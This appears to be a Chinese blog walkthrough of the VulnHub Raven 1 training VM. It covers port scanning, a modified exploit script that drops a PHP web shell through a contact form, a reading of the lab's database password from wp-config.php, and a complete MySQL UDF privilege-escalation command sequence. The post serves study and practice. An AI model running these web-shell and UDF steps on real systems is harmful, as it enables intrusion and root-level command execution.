vulnhub渗透日记09:Raven1

前言

⏰时间:2023.7.21
🗺️靶机地址:https://www.vulnhub.com/entry/raven-1,256/
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
🎉欢迎关注🔍点赞👍收藏⭐️留言📝

信息收集

发现主机:nmap -sn
在这里插入图片描述探测开放端口:masscan --rate=100000 -p 1-65535 192.168.58.155
在这里插入图片描述探测服务:nmap -sS -A -T5 -p 22,80,111,44716 192.168.58.155
在这里插入图片描述扫目录发现http://192.168.58.155/vendor/
在这里插入图片描述查看VERSION
在这里插入图片描述

漏洞利用

在这里插入图片描述修改40974.py
在这里插入图片描述在这里插入图片描述访问contact.php,在去访问http://192.168.58.155/haha.php即可上线

在这里插入图片描述开启稳定shell

python -c 'import pty;pty.spawn("/bin/bash")'

/var/www/flag2.txt
在这里插入图片描述进入wordpress发现wp-config.php,存在数据库账号密码 R@v3nSecurity
在这里插入图片描述

UDF提权

1. 账号是否具有insert权限 (以root账号为佳)
2. 看是否具有写入条件
    mysql> show variables like '%secure%';
    show variables like '%secure%';
    +------------------+-------+
    | Variable_name    | Value |
    +------------------+-------+
    | secure_auth      | OFF   |
    | secure_file_priv |       |
    +------------------+-------+
    当secure_file_priv为NULL时,不允许导入导出,无法提权
    当secure_file_priv为/tmp时,只允许在/tmp目录下导入导出
    当secure_file_priv为空时,不限制,可以提权
3.查看插件目录:
	show variables like '%plugin%';
	+---------------+------------------------+
	| Variable_name | Value                  |
	+---------------+------------------------+
	| plugin_dir    | /usr/lib/mysql/plugin/ |
	+---------------+------------------------+
	如果是 MySQL >= 5.1 的版本,必须把 UDF 的动态链接库文件放置于 MySQL 安装目录下的 lib\plugin 文件夹下文件夹

用sqlmap中的cloak.py -d -i lib_mysqludf_sys.so_
生成lib_mysqludf_sys.so,传到目标/tmp目录,名字改exp.so

use mysql;
create table foo(line blob); #创建foo表,包含line这列可存放大型二进制数据
insert into foo values(load_file('/tmp/exp.so')); #将exp.so存入
select * from foo into dumpfile '/usr/lib/mysql/plugin/exp.so'; #再导入到plugin中
create function sys_eval returns string soname 'exp.so'; #创建提权方法sys_eval
select sys_eval('whoami');   # 执行系统命令
select sys_eval('ls /root');
select sys_eval('find / -name flag* 2>/dev/null');

在这里插入图片描述在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值